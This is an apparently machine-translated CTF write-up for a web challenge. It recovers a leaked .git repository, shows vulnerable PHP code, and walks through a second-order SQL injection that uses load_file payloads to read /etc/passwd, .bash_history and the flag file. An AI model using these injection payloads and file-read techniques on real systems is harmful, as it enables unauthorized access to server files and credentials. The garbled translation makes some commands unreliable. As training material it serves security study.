table of Contents
The knowledge
git restore files
How to determine if you can recover?
To see if there commit the file, if not, you need to restore, questions like this:
title reminds us not commit, git the need to restore.
Script and use
We use Wang Hang Gangster script for recovery.
First, install the script, and then open the console, enter
python GitHacker.py http://ffd1ae28-f0e2-41c3-9522-ce58080f91e6.node3.buuoj.cn/.git/#链接为有git泄露的链接
Then enter the new directory, enter
git log --relog
It will change the history of
copy commit under the arrow, enter
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
And then view the file, you can see the complete code is as follows:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
Secondary injection
Let's look at the following code:
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
with
$category = mysql_fetch_array($result)['category'];
We can see that in do=writetime we categroy variables were escaping each quotation mark, backslash and other former symbol will add a backslash (backslash database will automatically purge). In do=commentthe time of categroy will be invoked directly from the database, without any filtering, which led to the secondary injection.
For example, I POST $categroy=123‘//, although it had escaped, but the data in the database is still 123", to the sql statement when called, will become
$sql = "insert into comment
set category = '123’//',"
At this point you can still reach the destination injection.
SQL to read files
() Function reading load_file, worth noting that the contents of the file to read the file and returns a string. To use this function, the file must be located on the server host , you must specify the full path of the file , and must have FILE privileges . The file all bytes read , but the file content must be less than the max_allowed_packet . If the file does not exist or can not be read, because one of the previous conditions are not met, the function returns NULL.
.bash_history
.bash_history for the preservation of the history command in unix / linux system files in the root directory of users that ~/place.
.DS_Store File Disclosure
Documents leaked to download a local script , but this question irrelevant.
He began to do questions
First, get the source code, because of our login! = Yes, it will automatically jump to the login screen.
Figure reminds us of the last three account number and password, the password can be blasting out as follows: 666.
After logging in, you can begin to construct a categroy.
It is noteworthy that, where four lines of sql statement, and #can only comment line, so use / ** /.
We fill in the categroy post office categroy=aaa',content=database(),/*, just fill in the rest, and then enter the post, submit comments */#. At this point we become such statements:
$sql = "insert into comment
set category = 'aaa',content=database(),/*',
content = '*/#',
bo_id = '$bo_id'";
Results:
successfully injected.
Then we use the load_file () function reads the file:
payload:123',content=(select( load_file('/etc/passwd'))),/*
the re-read after seeing the file location file .bash_histroy
see .DS_Store a file / temp / html, the hex code reading and decoding the file:
see folder html under the names of all files.
Reading flag papers can be obtained flag.
payload: aaa',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
Reference article:
https://www.cnblogs.com/Tkitn/p/11649255.html
